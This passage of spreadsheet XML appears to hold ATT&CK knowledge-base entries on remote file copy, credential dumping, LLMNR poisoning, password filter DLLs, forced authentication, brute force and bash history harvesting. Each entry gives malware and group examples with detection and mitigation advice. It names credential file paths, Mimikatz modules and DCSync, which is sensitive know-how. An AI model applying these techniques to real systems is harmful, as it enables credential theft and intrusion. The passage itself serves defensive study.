    <t>[[Software/S0153|RedLeaves]] is capable of downloading a file from a specified URL.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] is capable of downloading files, including additional modules.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::JPCERT ChChes Feb 2017]][[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]] is capable of writing a file to the compromised system from the C2 server.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: cmd, cmd.exe</t>
  </si>
  <si>
    <t>[[Software/S0106|cmd]] can be used to copy files to a remotely connected system.[[CiteRef::TechNet Copy]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families are capable of downloading and executing binaries from its C2 server.[[CiteRef::Novetta Blockbuster Destructive Malware]][[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>can download remote files.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] has downloaded additional code and files from servers onto victims.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to download files from the C2 server.[[CiteRef::Lotus Blossom Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0053|SeaDuke]] is capable of uploading and downloading files.[[CiteRef::Unit 42 SeaDuke 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] has a command to upload a file to the victim machine.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has a command to download a file.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] downloads and executes additional PowerShell code and Windows binaries.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the [[Command and Control]] channel to bring tools into the victim network or through alternate protocols with another tool such as [[Software/S0095|FTP]]. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Adversaries may also copy files laterally between internal victim systems to support [[Lateral Movement]] with remote [[Execution]] using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [[Technique/T1077|Windows Admin Shares]] or [[Technique/T1076|Remote Desktop Protocol]].</t>
  </si>
  <si>
    <t>[[Software/S0042|LOWBALL]] uses the Dropbox API to  request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the [[Software/S0042|LOWBALL]] malware.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] is capable of downloading additional files.[[CiteRef::Invincea XTunnel]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] retrieves and executes an additional payload from its C2 server.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] is capable of performing remote file transmission.[[CiteRef::Crowdstrike DNC June 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] downloads another dropper from its C2 server.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0051|MiniDuke]] can download additional encrypted backdoors onto the victim via GIF files.[[CiteRef::Securelist MiniDuke Feb 2013]]</t>
  </si>
  <si>
    <t>[[Software/S0054|CloudDuke]] downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>After security appliances blocked one version of the [[Software/S0045|ADVSTORESHELL]] implant, [[Group/G0007|APT28]] actors compiled and delivered another [[Software/S0045|ADVSTORESHELL]] x64 backdoor.[[CiteRef::Kaspersky Sofacy]] [[Group/G0007|APT28]] also used a first-stage downloader to contact the C2 server to obtain the second-stage implant.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used various tools to download files, including DGet (a similar tool to wget).[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>Software: SEASHARPEE</t>
  </si>
  <si>
    <t>can download remote files onto victims.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0187|Daserf]] can download remote files.[[CiteRef::Trend Micro Daserf Nov 2017]][[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0074|Sakula]] has the capability to download files.[[CiteRef::Dell Sakula]]</t>
  </si>
  <si>
    <t>[[Software/S0080|Mivast]] has the capability to download and execute .exe files.[[CiteRef::Symantec Backdoor.Mivast]]</t>
  </si>
  <si>
    <t>Software: TDTESS</t>
  </si>
  <si>
    <t>has a command to download and execute an additional file.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.[[CiteRef::Volexity OceanLotus Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can copy files to remote machines.[[CiteRef::FireEye Clandestine Fox]]</t>
  </si>
  <si>
    <t>Software: RemoteCMD</t>
  </si>
  <si>
    <t>copies a file over to the remote system before execution [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] can download or upload files from its C2 server.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>Software: certutil, certutil.exe</t>
  </si>
  <si>
    <t>[[Software/S0160|certutil]] can be used to download files from a given URL.[[CiteRef::TechNet Certutil]][[CiteRef::Twitter subTee Certutil Downloader]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] can download remote files onto victims.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] can download additional files.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] has a command to download a file from the C2 server to the victim mobile device's SD card.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0077|CallMe]] has the capability to download a file to the victim from the C2 server.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0078|Psylo]] has a command to download a file to the system from its C2 server.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>A [[Group/G0040|Patchwork]] payload downloads additional malware from the C2 server.[[CiteRef::Securelist Dropping Elephant]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can download additional files.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>After re-establishing access to a victim network, [[Group/G0027|Threat Group-3390]] actors download tools including [[Software/S0008|gsecdump]] and WCE that are staged temporarily on websites that were previously compromised but never used.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] can execute a task to download a file.[[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>can download files from remote servers.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0118|Nidiran]] can download and execute files.[[CiteRef::Symantec Backdoor.Nidiran]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] searches for network drives and removable media and duplicates itself onto them.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] is capable of downloading additional files through C2 channels, including a new version of itself.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has installed updates and new malware on victims.[[CiteRef::PWC Cloud Hopper April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] is capable of downloading remote files.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0055|RARSTONE]] downloads its backdoor component from a C2 server and loads it directly into memory.[[CiteRef::Aquino RARSTONE]]</t>
  </si>
  <si>
    <t>Credential Access</t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>Password stealer and NTLM stealer modules in [[Software/S0046|CozyCar]] harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication. [[Software/S0046|CozyCar]] has also executed [[Software/S0002|Mimikatz]] for further victim penetration.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Common credential dumpers such as [[Software/S0002|Mimikatz]] access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [[Technique/T1055|Process Injection]] to reduce potential indicators of malicious activity.
NTLM hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [[Technique/T1078|Valid Accounts]] in-use by adversaries may help as well. 
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [[Software/S0002|Mimikatz]]. [[Technique/T1086|PowerShell]] scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,[[CiteRef::Powersploit]] which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. [[CiteRef::Microsoft DRSR Dec 2017]][[CiteRef::Microsoft GetNCCChanges]][[CiteRef::Samba DRSUAPI]] Note: Domain controllers may not log replication requests originating from the default domain controller account.[[CiteRef::Harmj0y DCSync Sept 2015]]. Also monitor for network protocols [[CiteRef::Microsoft DRSR Dec 2017]][[CiteRef::Microsoft NRPC Dec 2017]] and other replication requests[[CiteRef::Microsoft SAMR]] from IPs not associated with known domain controllers.[[CiteRef::AdSecurity DCSync Sept 2015]] ,</t>
  </si>
  <si>
    <t>Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [[Technique/T1078|Valid Accounts]] if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.[[CiteRef::Microsoft LSA]]
Identify and block potentially malicious software that may be used to dump credentials by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements.[[CiteRef::TechNet Credential Guard]] It also does not protect against all forms of credential dumping.[[CiteRef::GitHub SHB Credential Guard]]
Manage the access control list for ?Replicating Directory Changes? and other permissions associated with domain controller replication.[[CiteRef::AdSecurity DCSync Sept 2015]][[CiteRef::Microsoft Replication ACL]]
Consider disabling or restricting NTLM traffic.[[CiteRef::Microsoft Disable NTLM Nov 2012]]</t>
  </si>
  <si>
    <t>Vincent Le Toux</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1003</t>
  </si>
  <si>
    <t>Private Keys</t>
  </si>
  <si>
    <t>Software: Mimikatz</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]]'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.[[CiteRef::Adsecurity Mimikatz Guide]]</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication. ,</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [[Technique/T1078|Valid Accounts]].</t>
  </si>
  <si>
    <t>Linux,Windows,macOS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1145</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] dumped the login data database from &lt;code&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used credential dumping tools to steal credentials to accounts logged into the compromised system.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning</t>
  </si>
  <si>
    <t>Software: Responder</t>
  </si>
  <si>
    <t>is used to poison name services to gather hashes and credentials from systems within a local network.[[CiteRef::GitHub Responder]]</t>
  </si>
  <si>
    <t>Windows Registry,Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of ?0? indicates LLMNR is disabled.[[CiteRef::Sternsecurity LLMNR-NBTNS]]
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.[[CiteRef::GitHub Conveigh]] ,</t>
  </si>
  <si>
    <t>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment.[[CiteRef::ADSecurity Windows Secure Baseline]]
Use host-based security software to block LLMNR/NetBIOS traffic.</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1171</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]] performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the LSA, SAM table, credential vault, DCSync/NetSync, and DPAPI.[[CiteRef::Deply Mimikatz]][[CiteRef::GitHub Mimikatz lsadump Module]][[CiteRef::Directory Services Internals DPAPI Backup Keys Oct 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0048|PinchDuke]] steals credentials from compromised hosts. [[Software/S0048|PinchDuke]]'s credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by [[Software/S0048|PinchDuke]] include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>Software: gsecdump</t>
  </si>
  <si>
    <t>[[Software/S0008|gsecdump]] can dump Windows password hashes and LSA secrets.[[CiteRef::TrueSec Gsecdump]]</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] harvests plain-text credentials as a password filter registered on domain controllers.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe.[[CiteRef::Clymb3r Function Hook Passwords Sept 2013]] ,</t>
  </si>
  <si>
    <t>Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (&lt;code&gt;C:\Windows\System32\&lt;/code&gt; by default) of a domain controller and/or local computer with a corresponding entry in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;.[[CiteRef:: Microsoft Install Password Filter n.d]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1174</t>
  </si>
  <si>
    <t>Software: pwdump</t>
  </si>
  <si>
    <t>[[Software/S0006|pwdump]] can be used to dump credentials.[[CiteRef::Wikipedia pwdump]]</t>
  </si>
  <si>
    <t>[[Group/G0021|Molerats]] used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used a modified version of pentesting tools wmiexec.vbs and secretsdump.py to dump credentials.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::Github AD-Pentest-Script]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] steals credentials stored inside Internet Explorer.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>Software: Windows Credential Editor, WCE</t>
  </si>
  <si>
    <t>[[Software/S0005|Windows Credential Editor]] can dump credentials.[[CiteRef::Amplia WCE]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] dumps credentials.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used [[Software/S0005|Windows Credential Editor]] for credential dumping, as well as Metasploit?s [[Software/S0029|PsExec]] NTDSGRAB module to obtain a copy of the victim's Active Directory database.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] has performed forced authentication to gather hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>File monitoring,Network protocol analysis,Network device logs,Process use of network</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered.[[CiteRef::US-CERT APT Energy Oct 2017]] ,</t>
  </si>
  <si>
    <t>Block SMB  traffic from exiting an enterprise network with egress filtering or by blocking TCP ports 139, 445 and UDP port 137. Filter or block WebDAV protocol traffic from exiting the network. If access to external resources over SMB and WebDAV is necessary, then traffic should be tightly limited with whitelisting.[[CiteRef::US-CERT SMB Security]][[CiteRef::US-CERT APT Energy Oct 2017]]
For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</t>
  </si>
  <si>
    <t>Teodor Cimpoesu</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1187</t>
  </si>
  <si>
    <t>[[Software/S0138|OLDBAIT]] collects credentials from Internet Explorer, Mozilla Firefox, Eudora, and several email clients.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] regularly deploys both publicly available and custom password retrieval tools on victims.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>Software: Cachedump</t>
  </si>
  <si>
    <t>[[Software/S0119|Cachedump]] can extract cached password hashes from a system?s registry.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] is capable of stealing usernames and passwords from browsers on the victim machine.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>Software: Lslsass</t>
  </si>
  <si>
    <t>[[Software/S0121|Lslsass]] can dump active logon session password hashes from the lsass process.[[CiteRef::Mandiant APT1]]</t>
  </si>
  <si>
    <t>Credential dumping is the process of obtaining account login and password information from the operating system and software. Credentials can be used to perform [[Lateral Movement]] and access restricted information.
Tools may dump credentials in many different ways: extracting credential hashes for offline cracking, extracting plaintext passwords, and extracting Kerberos tickets, among others. Examples of credential dumpers include pwdump7, [[Software/S0005|Windows Credential Editor]], [[Software/S0002|Mimikatz]], and [[Software/S0008|gsecdump]]. These tools are in use by both professional security testers and adversaries.
Plaintext passwords can be obtained using tools such as [[Software/S0002|Mimikatz]] to extract passwords stored by the Local Security Authority (LSA). If smart cards are used to authenticate to a domain using a personal identification number (PIN), then that PIN is also cached as a result and may be dumped.[[CiteRef::Github Mimikatz Module sekurlsa]]
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API)[[CiteRef::Microsoft DRSR Dec 2017]][[CiteRef::Microsoft GetNCCChanges]][[CiteRef::Samba DRSUAPI]][[CiteRef::Wine API samlib.dll]] to simulate the replication process from a remote domain controller.  Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data [[CiteRef::ADSecurity Mimikatz DCSync]] from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [[Technique/T1097|Pass the Ticket]][[CiteRef::Harmj0y Mimikatz and DCSync]] or change an account's password as noted in [[Technique/T1098|Account Manipulation]].[[CiteRef::InsiderThreat ChangeNTLM July 2017]] DCSync functionality has been included in the "lsadump" module in Mimikatz.[[CiteRef::GitHub Mimikatz lsadump Module]] Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.[[CiteRef::Microsoft NRPC Dec 2017]]</t>
  </si>
  <si>
    <t>Poseidon Group</t>
  </si>
  <si>
    <t>Poseidon Group ,</t>
  </si>
  <si>
    <t>G0033</t>
  </si>
  <si>
    <t>[[Group/G0033|Poseidon Group]] conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>Software: Net Crawler, NetC</t>
  </si>
  <si>
    <t>[[Software/S0056|Net Crawler]] uses credential dumpers such as [[Software/S0002|Mimikatz]] and [[Software/S0005|Windows Credential Editor]] to extract cached credentials from Windows systems.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>[[Software/S0056|Net Crawler]] uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. 
Monitor authentication logs for system and application login failures of [[Technique/T1078|Valid Accounts]]. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.
Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. ,</t>
  </si>
  <si>
    <t>Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Use multifactor authentication. Follow best practices for mitigating access to [[Technique/T1078|Valid Accounts]]</t>
  </si>
  <si>
    <t>John Strand</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1110</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] dropped and executed Hydra, a password cracker.[[CiteRef::US-CERT APT Energy Oct 2017]][[CiteRef::Kali Hydra]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used brute force techniques to obtain credentials.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0052|OnionDuke]] steals credentials from its victims.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Group/G0001|Axiom]] has been known to dump credentials.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has dumped credentials from victims in several ways, including by using open source tools [[Software/S0002|Mimikatz]] and Lazagne, or by harvesting credentials when users log into Outlook Web Access.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used various tools to perform credential dumping.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument "dig." The group has also used a tools to dump passwords from browsers.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] collects user credentials, including passwords, for various programs and browsers, including popular instant messaging applications, Web browsers, and email clients. Windows account hashes, domain accounts, and LSA secrets are also collected, as are WLAN keys.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can recover hashed passwords.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.[[CiteRef::Novetta Blockbuster RATs]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] has dumped credentials from victims.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]] Specifically, the group has used the tool GET5 Penetrator to look for remote login and hard-coded credentials.[[CiteRef::DarkReading FireEye FIN5 Oct 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors have used [[Software/S0008|gsecdump]] and a modified version of [[Software/S0002|Mimikatz]] called Wrapikatz to dump credentials. They have also dumped credentials from domain controllers.[[CiteRef::Dell TG-3390]][[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0039|Suckfly]] used a signed credential-dumping tool to obtain victim account credentials.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>has used credential dumping tools.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0041|Strider]] has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to dump credentials any time a domain, local user, or administrator logs in or changes a password.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can dump the SAM database.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>Some [[Software/S0093|Backdoor.Oldrea]] samples contain a publicly available Web browser password recovery tool.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] may attempt to connect to systems within a victim's network using &lt;code&gt;net use&lt;/code&gt; commands and a predefined list or collection of passwords.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Group/G0003|Cleaver]] has been known to dump credentials.[[CiteRef::Cylance Cleaver]]</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can dump passwords and save them into &lt;code&gt;\ProgramData\Mail\MailAg\pwds.txt&lt;/code&gt;.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] dropped and executed SecretsDump, a tool that dumps password hashes.[[CiteRef::US-CERT APT Energy Oct 2017]][[CiteRef::Core Security Impacket]]</t>
  </si>
  <si>
    <t>[[Software/S0080|Mivast]] has the capability to gather NTLM password information.[[CiteRef::Symantec Backdoor.Mivast]]</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user?s &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the user?s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials.[[CiteRef::External to DA, the OS X Way]]</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;. ,</t>
  </si>
  <si>
    <t>There are multiple methods of preventing a user's command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user's .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.</t>
  </si>
  <si>
    <t>Linux,macOS</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1139</t>
  </si>
  <si>
    <t>Input Prompt</t>
  </si>
  <si>
